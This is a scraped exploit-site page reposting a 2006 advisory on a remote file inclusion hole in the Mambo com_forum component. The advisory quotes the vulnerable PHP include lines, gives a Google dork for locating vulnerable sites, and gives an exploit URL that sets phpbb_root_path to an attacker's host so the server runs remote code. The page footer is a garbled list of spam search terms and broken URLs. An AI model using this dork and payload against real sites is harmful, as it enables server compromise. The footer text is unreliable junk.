about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , com_forum Mambo Component <= 1.2.4RC3 Remote Include Vulnerability




2006-07-09 com_forum Mambo Component <= 1.2.4RC3 Remote Include Vulnerability
Bug Found by h4ntu [http://h4ntu.com] #batamhacker crew
Another Mambo component remote inclusion vulneribility

download :
http://mamboxchange.com/frs/download.php/6873/phpbb_component1.2.4RC3.zip

bug found in file : download.php

define('IN_PHPBB', true);
//$phpbb_root_path = './';
include($phpbb_root_path . 'extension.inc ');
include($phpbb_root_path . 'common.'.$phpEx);


google dork: inurl:com_forum

http://[site]/[path]/components/com_forum/download.php?phpbb_root_path=[attacker]

Greetz : Baylaw, Reel, JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo,
and all #batamhacker [at] dalnet crew, #mardongan, #motha,
#papmahackerlink

securitydot.net - 2006-07-09

Advertising

Copyright 2007, SecurityDot
Sat, 04 Jul 2009 21:05:44 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Phimsex.Co sex inject e361 www.sreeja www.89.cm. www.pinkwa www.btwang Vdeoxxx p...2Fapi/ Trisha bat www.6hb.cn write_ok.p Www.Freese www.89.cm. www.3plc.c coppermine foot sex Vdeoxxx www.haojie Www.iyotub buffie the news/explo www. sexy www.sex300 Dolphin-v. [img] carma brigez multiple b WWW.TAMIL mom and so ver sexo serach vbu www.nexxx. Freesexeym fuc vedio Cewe bugil search/exp www.stzjin www;worlds cowlist.co Animation msn chekre www.nexxx. javascript w.w.w.xxx msn 8.0 sxs arabe Nada derin www.nicevi